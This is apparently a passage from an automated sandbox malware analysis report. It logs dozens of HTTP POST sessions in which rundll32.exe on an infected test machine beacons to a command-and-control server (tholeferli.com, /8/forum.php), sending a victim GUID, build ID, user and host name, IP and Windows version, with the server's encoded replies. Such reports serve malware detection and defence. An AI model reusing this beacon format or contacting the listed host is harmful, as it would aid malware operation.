                                                Data Ascii: cNGTMARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                13192.168.2.2249180194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:08.731694937 CEST310OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:08.901592970 CEST310INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:08 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 4b 50 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHKPSARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                130192.168.2.2249297194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:08.328980923 CEST441OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:08.485219002 CEST441INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:08 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 47 54 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMGTNARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                131192.168.2.2249298194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:08.808880091 CEST442OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:08.978435040 CEST442INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:08 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTZAGARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                132192.168.2.2249299194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:09.240680933 CEST443OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:10.409220934 CEST444INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:10 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 46 55 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJFUQARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                133192.168.2.2249300194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:10.688029051 CEST444OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:10.859375954 CEST445INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:10 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4b 41 5a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cKAZPARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                134192.168.2.2249301194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:11.138365030 CEST445OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:11.305207014 CEST446INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:11 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 4e 4d 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQNMJARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                135192.168.2.2249302194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:11.585130930 CEST447OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:12.743241072 CEST447INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:12 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZZAAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                136192.168.2.2249303194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:13.020370007 CEST448OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:13.177135944 CEST448INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:13 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZFUAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                137192.168.2.2249304194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:13.495186090 CEST449OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:13.650988102 CEST449INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:13 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 4d 4e 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNMNMARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                138192.168.2.2249305194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:13.931045055 CEST450OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:14.099052906 CEST450INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:13 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 43 58 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMCXNARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                139192.168.2.2249306194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:14.379228115 CEST451OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:14.550126076 CEST451INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:14 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZAZAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                14192.168.2.2249181194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:09.185193062 CEST311OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:09.357000113 CEST311INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:09 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 54 47 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYTGBARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                140192.168.2.2249307194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:14.831377029 CEST452OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:14.989069939 CEST452INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:14 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 54 47 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJTGQARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                141192.168.2.2249308194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:15.274631023 CEST453OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:15.430584908 CEST454INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:15 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 4a 51 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYJQBARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                142192.168.2.2249309194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:15.704440117 CEST454OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:15.873754978 CEST455INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:15 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBZAYARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                143192.168.2.2249310194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:16.147488117 CEST456OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:16.313445091 CEST456INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:16 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 56 45 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cAVEZARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                144192.168.2.2249311194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:16.594722986 CEST457OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:16.777502060 CEST457INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:16 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 59 42 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFYBUARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                145192.168.2.2249312194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:17.064452887 CEST458OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
